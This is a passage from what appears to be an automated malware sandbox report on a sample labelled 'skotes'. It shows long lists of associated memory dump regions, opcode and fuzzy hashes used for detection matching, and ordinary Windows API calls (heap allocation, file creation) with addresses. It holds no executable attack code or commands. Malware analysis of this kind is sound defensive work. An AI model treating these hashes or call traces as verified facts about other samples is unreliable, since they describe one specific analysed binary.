                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                                                                          • Opcode ID: cd302660003b4e402f70530d31cf85abd530eac42e961d6a22204fd1b7b06a2d
                                                                                                                                                                                                                                          • Instruction ID: de941eb5f860198dc53200f08801e0f1cfe94a329f33a647e41528115296b6ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd302660003b4e402f70530d31cf85abd530eac42e961d6a22204fd1b7b06a2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79111575A0420AAFCB05DF58E94199A7BF4EF49314F0440A9F809AB251EB70EE25CB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BAA813,00000001,00000364,00000006,000000FF,?,00B8D3FC,EB1D7F10,?,00B87A8B,?), ref: 00BAD871
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 7fd32bfbfa00ce3ab89f94fbbe3cff8ffbf82b5e19a1282ce49b7629230ffe0d
                                                                                                                                                                                                                                          • Instruction ID: e970bf32d98f232dafea7469c56d6524ceb09d404033ea1a652fdae6a907c275
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd32bfbfa00ce3ab89f94fbbe3cff8ffbf82b5e19a1282ce49b7629230ffe0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3F02E3164D12466DB213B729C01A5B77D9DF47370B1480E1EC0697981DF38DC0081E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,EB1D7F10,?,?,00B8D3FC,EB1D7F10,?,00B87A8B,?,?,?,?,?,?,00B77465,?), ref: 00BAB07E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 786dce069b2f86b78657429bfb7f2f535904bfc917bf5492797de485f5dcf20f
                                                                                                                                                                                                                                          • Instruction ID: c28c7953867eee1dfda160d2d36ef14195fcc6870c26a3d57c238ec506477bbb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 786dce069b2f86b78657429bfb7f2f535904bfc917bf5492797de485f5dcf20f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E06D3514D62696EA3132B58C41F6FB6C8DF433A0F1512A1AD7496192EF60DC4081E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00BB1B65,?,?,00000000,?,00BB1B65,00000000,0000000C), ref: 00BB1792
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: fb0e43f2774a145b5860006f5c8166649e5f08146680888f6b9fafcb4f5e4154
                                                                                                                                                                                                                                          • Instruction ID: 5780eb9ea9ed5fc8f9d5b9552e884ef2987cd88ac28f2c679a57323df0a04f5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb0e43f2774a145b5860006f5c8166649e5f08146680888f6b9fafcb4f5e4154
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44D09E3204010DBBDF119E84DC01EDA3BAAFB48714F014100BE1896120C772F8319B55
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3003188615.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_48e0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6febbe8849472116865b439e623d338b67baef7c51f20fd298e66abab19f6733
                                                                                                                                                                                                                                          • Instruction ID: 948d69c74768e187d52c47d652ab0d1b4f68233f5011685044f3febb7b01babf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6febbe8849472116865b439e623d338b67baef7c51f20fd298e66abab19f6733
